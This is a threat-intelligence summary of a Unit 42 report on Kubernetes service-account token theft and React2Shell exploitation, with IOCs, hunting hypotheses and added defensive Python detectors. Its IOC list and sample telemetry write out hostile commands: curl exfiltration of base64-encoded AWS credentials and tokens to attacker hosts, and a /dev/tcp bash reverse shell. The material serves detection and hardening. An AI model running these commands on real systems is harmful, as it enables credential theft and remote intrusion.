
Understanding Current Threats to Kubernetes Environments

Threat actors are increasingly targeting Kubernetes environments by exploiting vulnerabilities like React2Shell and misconfigurations to steal service account tokens. These stolen identities are then used to escalate privileges and move laterally into backend cloud infrastructure, leading to severe impacts such as cryptocurrency theft.

Sens: Immediate · Conf: high · Analyzed: 2026-04-07 · reports

Authors: Unit 42

Actors: Slow Pisces, TeamTNT, SCARLETEEL, VoidLink, TeamPCP

Source: Palo Alto Networks

IOCs · 2

Key Takeaways

  • Kubernetes-related threat operations increased 282% over the last year, heavily targeting the IT sector.
  • Threat actors like Slow Pisces are stealing Kubernetes service account tokens to pivot into broader cloud infrastructure.
  • The React2Shell vulnerability (CVE-2025-55182) is being actively exploited to gain RCE in containers and steal cloud credentials.
  • Attackers frequently use open-source tools like Peirates, and custom tooling attributed to VoidLink and TeamPCP, for automated token harvesting.
  • Defenders must enforce strict RBAC, use short-lived projected tokens, and monitor Kubernetes audit logs and runtime behavior.

Affected Systems

  • Kubernetes
  • Cloud Infrastructure (AWS, GCP, Azure)
  • React Server Components (RSC)

Vulnerabilities (CVEs)

  • CVE-2025-55182

Attack Chain

Attackers gain initial access via spear-phishing or exploiting public-facing vulnerabilities like React2Shell (CVE-2025-55182) to achieve remote code execution in a Kubernetes pod. Once inside, they enumerate the environment and extract the mounted service account token from /var/run/secrets/kubernetes.io/serviceaccount/token. Using this token, they authenticate to the Kubernetes API to escalate privileges, enumerate secrets, and deploy backdoors. Finally, they use the stolen identities to pivot into the broader cloud infrastructure, accessing backend systems and exfiltrating sensitive data or financial assets.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: Yes
  • Platforms: Cortex XQL, Palo Alto Networks Threat Prevention

The article provides a Cortex XQL query to detect service account token exfiltration via curl/wget. It also lists Cortex alert names mapped to MITRE techniques and mentions Threat Prevention signatures for CVE-2025-55182.

Detection Engineering Assessment

  • EDR Visibility: High. EDR/XDR agents on Kubernetes nodes can monitor container runtime behavior, including unexpected process execution (e.g., curl/wget reading token files) and reverse shells.
  • Network Visibility: Medium. Network telemetry can detect outbound connections to C2 servers or unusual API requests, but pod-to-pod and pod-to-API-server traffic is normally TLS-encrypted and hard to inspect without CNI or service-mesh integration.
  • Detection Difficulty: Moderate. The individual actions (reading a file, executing curl) are trivial; distinguishing a malicious token read from legitimate pod operations requires a behavioral baseline and correlation across events.

Required Log Sources

  • Kubernetes Audit Logs
  • Container Runtime Logs
  • Cloud Trail / Cloud Audit Logs
  • Process Execution Logs

Hunting Hypotheses

Hypothesis | Telemetry | ATT&CK Stage | FP Risk
Processes such as curl or wget reading /var/run/secrets/kubernetes.io/serviceaccount/token and immediately making outbound network connections | Process Execution Logs, Network Logs | Credential Access | Low
Anonymous or unexpected source IP addresses authenticating to the Kubernetes API server | Kubernetes Audit Logs | Discovery / Lateral Movement | Medium
Creation of pods with sensitive volume mounts, or in sensitive namespaces, by unusual identities | Kubernetes Audit Logs | Privilege Escalation | Medium
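The two audit-log hypotheses in the table, plus the secrets-enumeration step from the attack chain, expressed as a hunt over audit.k8s.io/v1 JSON-lines events. This is an added example, not code or a query from the Unit 42 report or Cortex; the cluster CIDRs, the pod-creator allowlist, the finding names and the sample log are this example's own assumptions and constructed data.

```python
import ipaddress
import json

# Assumptions (not from the report): the cluster's pod/node address space and the
# identities that legitimately create pods. Tune both to the cluster being hunted.
CLUSTER_CIDRS = [ipaddress.ip_network(c) for c in ("10.0.0.0/8", "192.168.0.0/16")]
POD_CREATORS = {
    "system:serviceaccount:kube-system:replicaset-controller",
    "system:serviceaccount:kube-system:daemon-set-controller",
    "system:serviceaccount:kube-system:job-controller",
    "system:serviceaccount:kube-system:statefulset-controller",
}
SENSITIVE_NAMESPACES = {"kube-system", "kube-public"}


def is_service_account(username):
    # Workload identities always take this form; humans and nodes do not.
    return username.startswith("system:serviceaccount:")


def outside_cluster(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in CLUSTER_CIDRS)


def sensitive_mounts(pod_spec):
    """Reasons a pod spec is dangerous: hostPath volumes, privileged containers, host namespaces."""
    reasons = []
    for vol in pod_spec.get("volumes", []):
        if "hostPath" in vol:
            reasons.append(f"hostPath:{vol['hostPath'].get('path')}")
    for c in pod_spec.get("containers", []):
        if c.get("securityContext", {}).get("privileged"):
            reasons.append(f"privileged:{c.get('name')}")
    reasons += [k for k in ("hostPID", "hostNetwork", "hostIPC") if pod_spec.get(k)]
    return reasons


def parse_audit_log(text):
    """audit.k8s.io/v1 events are written one JSON object per line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def hunt(events):
    findings = []
    for ev in events:
        if ev.get("stage") != "ResponseComplete":
            continue  # the same request is logged at several stages; keep one
        user = ev.get("user", {}).get("username", "")
        verb = ev.get("verb")
        ref = ev.get("objectRef", {})
        ips = ev.get("sourceIPs", [])
        # Hypothesis: anonymous callers, or a workload token replayed from outside the cluster.
        if user == "system:anonymous":
            findings.append(("anonymous-api-access", user, ips, ev["auditID"]))
        elif is_service_account(user) and any(outside_cluster(ip) for ip in ips):
            findings.append(("sa-token-from-outside-cluster", user, ips, ev["auditID"]))
        # Hypothesis: pod creation with sensitive mounts or in a sensitive namespace by an unusual identity.
        if verb == "create" and ref.get("resource") == "pods" and user not in POD_CREATORS:
            reasons = sensitive_mounts(ev.get("requestObject", {}).get("spec", {}))
            if ref.get("namespace") in SENSITIVE_NAMESPACES:
                reasons.append(f"namespace:{ref['namespace']}")
            if reasons:
                findings.append(("suspicious-pod-create", user, reasons, ev["auditID"]))
        # Discovery step of the attack chain: a workload identity enumerating Secrets.
        if ref.get("resource") == "secrets" and verb in ("list", "get") and is_service_account(user):
            findings.append(("sa-secret-enumeration", user, ref.get("namespace"), ev["auditID"]))
    return findings


# Constructed sample log (not from the report). 203.0.113.0/24 and 198.51.100.0/24 are
# documentation ranges standing in for attacker infrastructure.
SA = "system:serviceaccount:web:frontend-sa"


def _ev(audit_id, user, verb, resource, ns, ips, stage="ResponseComplete", request_object=None):
    ev = {"kind": "Event", "apiVersion": "audit.k8s.io/v1", "auditID": audit_id, "stage": stage,
          "verb": verb, "user": {"username": user}, "sourceIPs": ips,
          "objectRef": {"resource": resource, "namespace": ns}, "responseStatus": {"code": 200}}
    if request_object:
        ev["requestObject"] = request_object
    return ev


SAMPLE_AUDIT_LOG = "\n".join(json.dumps(e) for e in [
    _ev("a1", "system:serviceaccount:kube-system:replicaset-controller", "create", "pods", "web",
        ["10.0.0.5"], request_object={"spec": {"containers": [{"name": "app"}]}}),
    _ev("a2", SA, "list", "secrets", "web", ["10.244.1.7"]),
    _ev("a3", SA, "get", "pods", "web", ["203.0.113.10"]),
    _ev("a4", "system:anonymous", "list", "nodes", "", ["198.51.100.7"]),
    _ev("a5", SA, "create", "pods", "kube-system", ["10.244.1.7"],
        request_object={"spec": {"volumes": [{"name": "root", "hostPath": {"path": "/"}}],
                                 "containers": [{"name": "pwn", "securityContext": {"privileged": True}}]}}),
    _ev("a6", SA, "list", "secrets", "web", ["10.244.1.7"], stage="RequestReceived"),
])

if __name__ == "__main__":
    for finding in hunt(parse_audit_log(SAMPLE_AUDIT_LOG)):
        print(finding)
```

Two caveats when running this against a real cluster: requestObject is only present when the audit policy logs pod creates at the Request or RequestResponse level, and sourceIPs reflects what the API server sees, so behind a load balancer that does not preserve client addresses the out-of-cluster check degrades to flagging the balancer.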

Control Gaps

  • Disabled Kubernetes Audit Logs
  • Overly permissive RBAC roles
  • Long-lived service account tokens
  • Lack of runtime container monitoring

Key Behavioral Indicators

  • Unexpected shell execution inside containers
  • Reads of service account tokens by non-orchestration processes
  • Outbound HTTP requests containing base64-encoded environment variables or credentials

False Positive Assessment

  • Medium

Recommendations

Immediate Mitigation

  • Identify and patch applications vulnerable to React2Shell (CVE-2025-55182).
  • Review and restrict overly permissive RBAC roles and ClusterRoleBindings.
  • Enable Kubernetes Audit Logging if currently disabled.

Infrastructure Hardening

  • Implement short-lived, projected service account tokens.
  • Enforce Pod Security Standards (PSS), specifically the Restricted profile.
  • Isolate workloads and namespaces to limit lateral movement.
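The control gaps and hardening items above (long-lived or unnecessary tokens, permissive RBAC, missing Restricted-profile settings) as a manifest audit, with the weak manifest beside its hardened form. This is an added example, not tooling from the report; the check names, the one-hour token cap and the sample manifests are this example's own assumptions and constructed data. Pods that do not need the API should disable automount; pods that do should mount an explicit projected token with a short expirationSeconds, which is what the hardened sample does.

```python
MAX_TOKEN_TTL = 3600  # assumption: projected tokens must expire within an hour


def audit_pod(pod):
    """Gaps in a Pod manifest: automounted or long-lived tokens, hostPath, host namespaces,
    and the container settings the Pod Security Standards Restricted profile requires."""
    gaps = []
    spec = pod.get("spec", {})
    if spec.get("automountServiceAccountToken", True):
        gaps.append("automountServiceAccountToken not disabled")
    for vol in spec.get("volumes", []):
        for src in vol.get("projected", {}).get("sources", []):
            tok = src.get("serviceAccountToken")
            if tok is None:
                continue
            ttl = tok.get("expirationSeconds")
            if ttl is None or ttl > MAX_TOKEN_TTL:
                gaps.append(f"projected token {vol.get('name')}: ttl {ttl} exceeds {MAX_TOKEN_TTL}s")
        if "hostPath" in vol:
            gaps.append(f"hostPath volume {vol.get('name')}")
    gaps += [f"{k} enabled" for k in ("hostNetwork", "hostPID", "hostIPC") if spec.get(k)]
    pod_sc = spec.get("securityContext", {})
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        sc = c.get("securityContext", {})
        name = c["name"]
        if sc.get("privileged"):
            gaps.append(f"{name}: privileged")
        if sc.get("allowPrivilegeEscalation") is not False:
            gaps.append(f"{name}: allowPrivilegeEscalation not false")
        if not (sc.get("runAsNonRoot") or pod_sc.get("runAsNonRoot")):
            gaps.append(f"{name}: runAsNonRoot not set")
        if "ALL" not in sc.get("capabilities", {}).get("drop", []):
            gaps.append(f"{name}: capabilities not dropped")
        if not (sc.get("seccompProfile") or pod_sc.get("seccompProfile")):
            gaps.append(f"{name}: seccompProfile not set")
    return gaps


def audit_rbac(role, binding):
    """Flag wildcard rules, Secret listing, cluster-admin, and cluster-wide bindings of service accounts."""
    gaps = []
    rname = role["metadata"]["name"]
    for rule in role.get("rules", []):
        if "*" in rule.get("verbs", []) or "*" in rule.get("resources", []):
            gaps.append(f"{rname}: wildcard rule")
        if "secrets" in rule.get("resources", []) and "list" in rule.get("verbs", []):
            gaps.append(f"{rname}: can list secrets")
    bname = binding["metadata"]["name"]
    if binding.get("roleRef", {}).get("name") == "cluster-admin":
        gaps.append(f"{bname}: binds cluster-admin")
    if binding.get("kind") == "ClusterRoleBinding":
        for s in binding.get("subjects", []):
            if s.get("kind") == "ServiceAccount":
                gaps.append(f"{bname}: ClusterRoleBinding to service account {s['namespace']}/{s['name']}")
    return gaps


# Constructed manifests (not from the report), as parsed from `kubectl get ... -o json`.
WEAK_POD = {
    "apiVersion": "v1", "kind": "Pod", "metadata": {"name": "web", "namespace": "prod"},
    "spec": {"volumes": [{"name": "host", "hostPath": {"path": "/"}}],
             "containers": [{"name": "app", "image": "app:1", "securityContext": {"privileged": True}}]},
}
HARDENED_POD = {
    "apiVersion": "v1", "kind": "Pod", "metadata": {"name": "web", "namespace": "prod"},
    "spec": {
        "automountServiceAccountToken": False,
        "securityContext": {"runAsNonRoot": True, "seccompProfile": {"type": "RuntimeDefault"}},
        "volumes": [{"name": "sa-token", "projected": {"sources": [
            {"serviceAccountToken": {"path": "token", "expirationSeconds": 600}}]}}],
        "containers": [{"name": "app", "image": "app:1",
                        "volumeMounts": [{"name": "sa-token", "mountPath": "/var/run/secrets/tokens", "readOnly": True}],
                        "securityContext": {"allowPrivilegeEscalation": False, "capabilities": {"drop": ["ALL"]}}}],
    },
}
WEAK_ROLE = {"kind": "ClusterRole", "metadata": {"name": "debug"},
             "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]}
WEAK_BINDING = {"kind": "ClusterRoleBinding", "metadata": {"name": "debug-binding"},
                "subjects": [{"kind": "ServiceAccount", "name": "web", "namespace": "prod"}],
                "roleRef": {"kind": "ClusterRole", "name": "debug"}}
SCOPED_ROLE = {"kind": "Role", "metadata": {"name": "web-config", "namespace": "prod"},
               "rules": [{"apiGroups": [""], "resources": ["configmaps"], "verbs": ["get"]}]}
SCOPED_BINDING = {"kind": "RoleBinding", "metadata": {"name": "web-config", "namespace": "prod"},
                  "subjects": [{"kind": "ServiceAccount", "name": "web", "namespace": "prod"}],
                  "roleRef": {"kind": "Role", "name": "web-config"}}

if __name__ == "__main__":
    print(audit_pod(WEAK_POD), audit_pod(HARDENED_POD))
    print(audit_rbac(WEAK_ROLE, WEAK_BINDING), audit_rbac(SCOPED_ROLE, SCOPED_BINDING))
```

The Pod checks mirror what a namespace labelled `pod-security.kubernetes.io/enforce: restricted` rejects at admission; running them over existing manifests shows what would break before the label is applied.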

User Protection

  • Deploy runtime protection (XDR) to Kubernetes nodes to monitor and block malicious container behavior.
  • Secure developer workstations to prevent initial access via spear-phishing.

Security Awareness

  • Train cloud operations and development teams on the risks of social engineering and credential theft.
  • Educate teams on secure Kubernetes configurations and the principle of least privilege.

MITRE ATT&CK Mapping

  • T1190 - Exploit Public-Facing Application
  • T1528 - Steal Application Access Token
  • T1552.001 - Unsecured Credentials: Credentials In Files
  • T1552.005 - Unsecured Credentials: Cloud Instance Metadata API
  • T1552.007 - Unsecured Credentials: Container API
  • T1613 - Container and Resource Discovery
  • T1609 - Container Administration Command
  • T1134 - Access Token Manipulation
  • T1610 - Deploy Container
  • T1611 - Escape to Host
  • T1078.001 - Valid Accounts: Default Accounts
  • T1059.004 - Command and Scripting Interpreter: Unix Shell
  • T1098.006 - Account Manipulation: Additional Container Cluster Roles

Additional IOCs

  • Ips:
  • IPs:
    • 104[.]238[.]149[.]198 - Exfiltration C2
    • 45[.]76[.]155[.]14 - Payload hosting
    • 23[.]235[.]188[.]3 - Payload hosting
    • 38[.]162[.]112[.]141 - Reverse shell destination IP observed in process telemetry
  • URLs:
    • hxxp://104[.]238[.]149[.]198:12349/BVN0VEdddye5odDFVR - Exfiltration endpoint
    • hxxp://45[.]76[.]155[.]14/vim - Fake vim backdoor URL
    • hxxp://23[.]235[.]188[.]3:653/get[.]sh - Payload URL
  • File Hashes:
    • 05eac3663d47a29da0d32f67e10d161f831138e10958dcd88b9dc97038948f69 (SHA256) - VoidLink Binary
    • 7d2c9b4a3942f6029d2de7f73723b505b64caa8e1763e4eb1f134360465185d0 (SHA256) - TeamPCP proxy.sh
    • bb470a803b6d7b12fb596d2e4a18ea9ca91f40fd34ded7f01a487eed9a1d814d (SHA256) - TeamPCP kube.py
    • 7ebfc53f17925af4340d4218aafd16ba39b5afa8b6ac1f7adc3dd92952a2a237 (SHA256) - Reverse shell bash process observed in telemetry
  • File Paths:
    • /var/run/secrets/kubernetes.io/serviceaccount/token - Targeted Kubernetes service account token path
    • /tmp/vim - Dropped backdoor path
  • Command Lines:
    • Purpose: Exfiltrate AWS credentials via base64 encoding | Tools: curl, base64, cat | Stage: Exfiltration | curl http://<ip>:<port>/<path>?<param>=`cat ./.aws/credentials | base64 -w 0`
    • Purpose: Download and execute fake vim backdoor | Tools: wget, chmod, nohup | Stage: Execution/Persistence
    • Purpose: Download and execute shell script | Tools: wget, curl, bash | Stage: Execution
    • Purpose: Exfiltrate Kubernetes token via HTTP header | Tools: curl, cat | Stage: Exfiltration
    • Purpose: Establish reverse shell | Tools: bash | Stage: Execution/C2 | bash -c bash -i >& /dev/tcp/<ip>/<port> 0>&1
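The behavioral indicators and command-line patterns above (token path passed to a process, a token in an HTTP header, base64-encoded credentials in a URL, a /dev/tcp reverse shell, and the first hunting hypothesis of a token read followed immediately by egress) run as detection logic over container process telemetry. This is an added example, not the report's Cortex XQL query; the event shape, the allowlisted reader, the ten-second window and the sample events are this example's own assumptions and constructed data, and 198.51.100.7 is a documentation address.

```python
import base64
import binascii
import re
import shlex
from urllib.parse import unquote, urlsplit

TOKEN_PATH = "/var/run/secrets/kubernetes.io/serviceaccount/token"
# Byte markers seen when a credential file, key or token is base64-decoded
# ("eyJ" is the start of any base64url-encoded JWT header).
CRED_MARKERS = (b"aws_access_key_id", b"AKIA", b"eyJ", b"-----BEGIN", b"password")
JWT = re.compile(r"eyJ[A-Za-z0-9_-]{10,}\.eyJ[A-Za-z0-9_-]{10,}")
REVERSE_SHELL = re.compile(r"/dev/(?:tcp|udp)/[\w.\-]+/\d+")
# Assumptions: the workload binary allowed to read the token, and how close a token
# read and an outbound connect must be to count as "immediately".
TOKEN_READERS = {"app-server"}
EGRESS_WINDOW = 10.0


def argv(cmdline):
    try:
        return shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: degrade to a plain split rather than drop the event
        return cmdline.split()


def decoded_credentials(cmdline):
    """Markers found after base64-decoding URL query values, the last path segment,
    and any bare base64-looking argument."""
    found = set()
    for arg in argv(cmdline):
        candidates = []
        if "://" in arg:
            parts = urlsplit(arg)
            for kv in parts.query.split("&"):
                val = kv.partition("=")[2]
                candidates += [val, unquote(val)]
            candidates.append(parts.path.rsplit("/", 1)[-1])
        elif re.fullmatch(r"[A-Za-z0-9+/=]{16,}", arg):
            candidates.append(arg)
        for c in candidates:
            try:
                blob = base64.b64decode(c + "=" * (-len(c) % 4), validate=True)
            except (binascii.Error, ValueError):
                continue
            found.update(m.decode() for m in CRED_MARKERS if m in blob)
    return sorted(found)


def detect(events):
    """Run the indicators over exec/open/connect events; token reads are correlated with
    egress per container because the reader (cat) and the sender (curl) are different pids."""
    findings = []
    token_reads = {}  # container -> (ts, comm) of the last non-allowlisted token read
    for ev in sorted(events, key=lambda e: e["ts"]):
        cid, pid = ev["container"], ev["pid"]
        if ev["type"] == "exec":
            cmd = ev["cmdline"]
            prog = (argv(cmd) or ["?"])[0].rsplit("/", 1)[-1]
            if TOKEN_PATH in cmd:
                findings.append(("token-path-in-cmdline", cid, pid, prog))
            if JWT.search(cmd):
                findings.append(("jwt-in-cmdline", cid, pid, prog))
            shell = REVERSE_SHELL.search(cmd)
            if shell:
                findings.append(("reverse-shell", cid, pid, shell.group(0)))
            markers = decoded_credentials(cmd)
            if markers:
                findings.append(("base64-credentials-in-url", cid, pid, markers))
        elif ev["type"] == "open" and ev["path"] == TOKEN_PATH and ev["comm"] not in TOKEN_READERS:
            token_reads[cid] = (ev["ts"], ev["comm"])
        elif ev["type"] == "connect" and cid in token_reads:
            read_ts, reader = token_reads[cid]
            if ev["ts"] - read_ts <= EGRESS_WINDOW:
                findings.append(("token-read-then-egress", cid, pid, f"{reader} -> {ev['dst']}"))
    return findings


CREDS_FILE = b"[default]\naws_access_key_id = AKIAEXAMPLE\n"  # constructed; not a real key
C = "web-7f9"
SAMPLE_EVENTS = [  # constructed telemetry in this example's own shape
    {"ts": 100.0, "container": C, "pid": 1, "type": "exec", "cmdline": "/app/app-server --port 8080"},
    {"ts": 100.5, "container": C, "pid": 1, "type": "open", "comm": "app-server", "path": TOKEN_PATH},
    {"ts": 101.0, "container": C, "pid": 1, "type": "connect", "dst": "10.96.0.1:443"},  # legitimate API call
    {"ts": 300.0, "container": C, "pid": 4410, "type": "exec",
     "cmdline": "bash -c 'bash -i >& /dev/tcp/198.51.100.7/4444 0>&1'"},
    {"ts": 304.9, "container": C, "pid": 4421, "type": "exec", "cmdline": f"cat {TOKEN_PATH}"},
    {"ts": 305.0, "container": C, "pid": 4421, "type": "open", "comm": "cat", "path": TOKEN_PATH},
    {"ts": 305.2, "container": C, "pid": 4422, "type": "exec",
     "cmdline": "curl -s -H 'X-Token: eyJhbGciOiJSUzI1NiIsImtpZCI6IngifQ.eyJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQifQ.c2ln' "
                "http://198.51.100.7:12349/x"},
    {"ts": 305.3, "container": C, "pid": 4422, "type": "connect", "dst": "198.51.100.7:12349"},
    {"ts": 400.0, "container": C, "pid": 4500, "type": "exec",
     "cmdline": "curl http://198.51.100.7:12349/p?d=" + base64.b64encode(CREDS_FILE).decode()},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The exec-based checks need only process command-line telemetry; the token-read correlation additionally needs file-open events, which means a kernel- or eBPF-level runtime sensor on the node rather than API-server logs.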